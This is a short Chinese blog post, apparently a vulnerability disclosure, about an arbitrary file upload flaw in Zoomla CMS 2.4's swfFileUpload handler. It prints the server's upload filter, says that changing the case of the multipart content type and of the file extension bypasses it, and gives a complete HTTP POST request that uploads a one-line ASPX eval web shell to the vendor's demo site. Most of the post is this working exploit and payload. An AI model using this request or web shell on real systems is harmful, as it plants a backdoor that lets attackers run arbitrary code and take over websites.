IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
    • 登录 注册

    逐浪cms 2.4某处任意文件上传

    没穿底裤发表于 2015-10-13 09:37:46
    love 0

    /Plugins/swfFileUpload/UploadHandler.ashx
    有一个全局过滤
    1
    asp_code.dll
    class ZoomlaSecurityCenter

    public static void CheckUpladFiles()

	{

		HttpRequest request = HttpContext.Current.Request;

		HttpResponse response = HttpContext.Current.Response;

		if (HttpContext.Current.Request.ContentType.IndexOf("multipart/form-data") > -1)

		{

			HttpFileCollection files = request.Files;

			for (int i = 0; i < files.Count; i++)

			{

				HttpPostedFile httpPostedFile = files[i];

				string fileName = httpPostedFile.FileName;

				if (httpPostedFile.ContentLength > 0)

				{

					if (fileName.IndexOf(".") > -1)

					{

						string[] array = fileName.Split(new char[]

						{

							'.'

						});

						for (int j = 1; j < array.Length; j++)

						{

							string ext = array[j].ToString().ToLower();

							if (!ZoomlaSecurityCenter.ExNameCheck(ext))

							{

								string findStr = System.IO.Path.GetExtension(fileName).ToLower().Replace(".", "");

								string text = SiteConfig.SiteOption.UploadFileExts.ToLower();

								if (!StringHelper.FoundCharInArr(text, findStr, "|"))

								{

									function.WriteErrMsg("上传的文件不是符合扩展名" + text + "的文件");

									response.End();

								}

							}

							else

							{

								function.WriteErrMsg("请勿上传可疑文件!");

								response.End();

							}

						}

					}

					else

					{

						function.WriteErrMsg("请勿上传可疑文件!");

						response.End();

					}

				}

			}

		}

	}

    将multipart/form-data的大小写改下就可以绕过了,局部过滤,可以改文件后缀名大小写绕过

    POST /Plugins/swfFileUpload/UploadHandler.ashx HTTP/1.1
Host: demo.zoomla.cn
Content-Length: 263
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36
Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryNyS0P5wwqaOrCYsh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=gwezhhqzegfs5nhcpdeaso5s; bdshare_firstime=1436497685958; jiathis_rdc=%7B%22http%3A//www.zoomla.cn/down/2407.shtml%22%3A%220%7C1436497760852%22%7D; hasshown=1

------WebKitFormBoundaryNyS0P5wwqaOrCYsh
Content-Disposition: form-data; name="Filedata"; filename="name.Aspx"
Content-Type: application/x-aspx

<%@ Page Language="Jscript"%><%eval(Request.Item["zsd"],"unsafe");%>
------WebKitFormBoundaryNyS0P5wwqaOrCYsh--



沪ICP备19023445号-2号
友情链接